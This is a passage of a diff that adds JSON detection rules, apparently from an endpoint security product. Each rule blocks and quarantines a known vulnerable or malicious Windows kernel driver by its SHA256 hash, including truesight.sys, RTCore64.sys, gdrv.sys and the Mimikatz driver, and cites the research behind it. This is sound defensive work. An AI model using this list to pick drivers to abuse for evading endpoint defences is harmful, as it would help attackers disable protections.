+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "193bcdc0b0107f36cb04123b1f0775905b5f632b5dd1efcddfbc3ebb53953f7c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ad771c4-5e40-5093-8c05-59f0142279bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621703Z",
+ "creation_date": "2026-03-23T11:45:29.621705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "506f953bbb285aeb8af0549eb24f52f3b7af36afe740afa36735bac70573ce28",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ae5948e-9aac-507b-a2f9-ac56fc445743",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820320Z",
+ "creation_date": "2026-03-23T11:45:30.820322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff322cd0cc30976f9dbdb7a3681529aeab0de7b7f5c5763362b02c15da9657a1",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7af5594d-4d91-580a-a1e6-5b5984bef814",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612249Z",
+ "creation_date": "2026-03-23T11:45:29.612251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aac86a3143de3e18dea6eab813b285da0718e9fb6bc0bbb46c6e7638476061d8",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b04bc1c-8ffe-5005-8c15-126167301243",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819655Z",
+ "creation_date": "2026-03-23T11:45:30.819657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2364c3cf230648dad30952701aef90acfc9891541c7e154e30c9750da213ed1",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b1b0d08-d4b7-532a-8718-493cb90ab7c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974126Z",
+ "creation_date": "2026-03-23T11:45:29.974128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed2f33452ec32830ffef2d5dc832985db9600c306ed890c47f3f33ccbb335c39",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b279ba1-ed75-5bcc-b5de-6bed9968da5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454506Z",
+ "creation_date": "2026-03-23T11:45:30.454510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b948219fd5d424f15ed9b5c7058d09b9559a14245b9bda5e805f9a8e5acecd1",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b2dfad3-782c-5d0b-87da-32fbc642bfc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609393Z",
+ "creation_date": "2026-03-23T11:45:29.609395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34da66774ba09c4a8fc59349401ca1fefaaf4e66a9c620c7782c072a16089ba3",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b44becc-73a2-5778-a56c-2bed822ab2cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823051Z",
+ "creation_date": "2026-03-23T11:45:30.823054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823059Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae71f40f06edda422efcd16f3a48f5b795b34dd6d9bb19c9c8f2e083f0850eb7",
+ "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b47358d-1fac-52bd-bc0d-51e6027f914b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810912Z",
+ "creation_date": "2026-03-23T11:45:31.810914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c3bdaec45bf06af38d31ed418d39eae539fd52f17003e563b3b838888f9f826",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b4d2daf-1d2a-5d51-b39b-b81c8aedc4bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147673Z",
+ "creation_date": "2026-03-23T11:45:31.147675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07261cf107fc56e6fd2849de2f000ef8540117f2da87a37bfd96ea71c08826aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b4ea073-a01f-571a-946a-6064234f66c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490696Z",
+ "creation_date": "2026-03-23T11:45:31.490698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05f63faf0945bb537ddc7ea671a0df2f5c1eff90a33c20dcbc5eb206b00a848d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b542c21-c392-5b7e-a39a-46849e297afb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829447Z",
+ "creation_date": "2026-03-23T11:45:30.829449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829455Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b29557159b2e112e50c26cb33c815cf842f61ee0a4f690c87a51641d67711531",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b614eee-e86b-58b6-9c69-42948b8f2950",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974349Z",
+ "creation_date": "2026-03-23T11:45:29.974351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b08743c8e1de8343ab0a0d453ca76487c6a438608c68c2b2921ea2c2a92821c",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b63620a-4b55-56c5-a7ef-384eb22b9a82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460040Z",
+ "creation_date": "2026-03-23T11:45:30.460044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad215185dc833c54d523350ef3dbc10b3357a88fc4dde00281d9af81ea0764d5",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b656e61-0e2b-5e1d-966f-6d0665acd09f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145605Z",
+ "creation_date": "2026-03-23T11:45:31.145607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "995ffff831e9b9135012eabc66a5fc24034b00e6b9f09c722de8991e0e6e63c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b6638e5-4d18-5495-8dbe-19eec173d358",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975656Z",
+ "creation_date": "2026-03-23T11:45:29.975657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "904e0f7d485a98e8497d5ec6dd6e6e1cf0b8d8e067fb64a9e09790af3c8c9d5a",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b6de935-0ce6-5c99-aaf0-b75a731f56d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477005Z",
+ "creation_date": "2026-03-23T11:45:31.477008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477017Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8caaf6e9de9ad63ff4a4443c39a7e690f3682ed31c1c8a5f0e6598abf023fe4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b84fa70-a485-5c8c-b90b-408476669e4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971150Z",
+ "creation_date": "2026-03-23T11:45:29.971153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77586c3968ec72ad19fa7098c9da27b0677e45220812eaab197075f4175e8cc6",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b8b3458-2975-5dd8-9a0a-2a384b30ea65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144428Z",
+ "creation_date": "2026-03-23T11:45:31.144430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07389bfd37f19dc970fe04ecad830eca1a85dfe47336f35ad29051c40f207c44",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b9aaba3-bb19-5b58-a839-93119c24a75e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830077Z",
+ "creation_date": "2026-03-23T11:45:30.830079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5711def9267bbc6ece42f46e3c313e3e89d3693bc75545fa7622513b2921325",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7b9d100c-776a-5d74-ae09-4d412883d99b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144633Z",
+ "creation_date": "2026-03-23T11:45:32.144635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "099ef4915d7899be543d891b48960c1d1604c55468c1377a6f71ce0e1a33c946",
+ "comment": "Malicious Kernel Driver (aka driver_099ef491.sys) [https://www.loldrivers.io/drivers/2ba1bccf-d8d7-464a-9ae1-41371c55e5e8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ba36510-e951-56e3-a01f-3c20770215ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149354Z",
+ "creation_date": "2026-03-23T11:45:31.149356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42eda58539cf9fe8cdf7ecca8b15e09f43ba54d30bb105d0dc45814bfc6495a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
